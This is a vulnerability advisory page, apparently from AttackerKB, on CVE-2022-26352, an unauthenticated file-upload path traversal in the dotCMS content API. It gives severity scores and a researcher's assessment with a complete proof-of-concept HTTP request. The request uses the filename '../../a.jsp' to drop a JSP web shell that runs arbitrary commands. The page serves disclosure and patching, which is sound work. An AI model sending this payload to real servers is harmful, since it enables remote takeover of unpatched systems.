CVE-2022-26352

2022-07-1700:00:00

attackerkb.com

125

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.975 High

EPSS

Percentile

100.0%

JSON

An issue was discovered in the ContentResource API in dotCMS 3.0 through 22.02. Attackers can craft a multipart form request to post a file whose filename is not initially sanitized. This allows directory traversal, in which the file is saved outside of the intended storage location. If anonymous content creation is enabled, this allows an unauthenticated attacker to upload an executable file, such as a .jsp file, that can lead to remote code execution.

Recent assessments:

jheysel-r7 at May 26, 2022 10:31pm UTC reported:

The API used by DotCMS is vulnerable to an arbitrary file upload vulnerability which can lead to RCE. The /api/content/ endpoint allows for files to be uploaded to the tomcat server. The filename in versions prior to 22.03, 5.3.8.10, 21.06.7 is not sanitized and allows the attacker to drop a malicious .jsp file in the webroot of the tomcat server, which is accessible remotely.

PoC taken from the write up mentioned below:

POST /api/content/ HTTP/1.1
Host: 172.16.199.227:8443
User-Agent: curl/7.64.1
Accept: */*
Content-Length: 1085
Content-Type: multipart/form-data; boundary=------------------------aadc326f7ae3eac3
Connection: close

--------------------------aadc326f7ae3eac3
Content-Disposition: form-data; name="name"; filename="../../a.jsp"
Content-Type: text/plain

&lt;%@ page import="java.util.*,java.io.*"%&gt;
&lt;%
%&gt;
&lt;HTML&gt;&lt;BODY&gt;
Commands with JSP
&lt;FORM METHOD="GET" NAME="myform" ACTION=""&gt;
&lt;INPUT TYPE="text" NAME="cmd"&gt;
&lt;INPUT TYPE="submit" VALUE="Send"&gt;
&lt;/FORM&gt;
<pre>
&lt;%
if (request.getParameter("cmd") != null) {
    out.println("Command: " + request.getParameter("cmd") + "<br>");
    Process p;
    if ( System.getProperty("os.name").toLowerCase().indexOf("windows") != -1){
        p = Runtime.getRuntime().exec("cmd.exe /C " + request.getParameter("cmd"));
    }
    else{
        p = Runtime.getRuntime().exec(request.getParameter("cmd"));
    }
    OutputStream os = p.getOutputStream();
    InputStream in = p.getInputStream();
    DataInputStream dis = new DataInputStream(in);
    String disr = dis.readLine();
    while ( disr != null ) {
    out.println(disr);
    disr = dis.readLine();
    }
}
%&gt;
</pre>
&lt;/BODY&gt;&lt;/HTML&gt;
--------------------------aadc326f7ae3eac3--

The filename has been changed to work on windows and on linux irrespective of the relative install path of DotCMS.

This vulnerability is trivial to exploit and patching immediately is recommended.

The security research to find this vulnerability was performed by Hussein Daher and Shubham Shah and they have written a very nice detailed write up for more information.

Assessed Attacker Value: 4
Assessed Attacker Value: 4Assessed Attacker Value: 5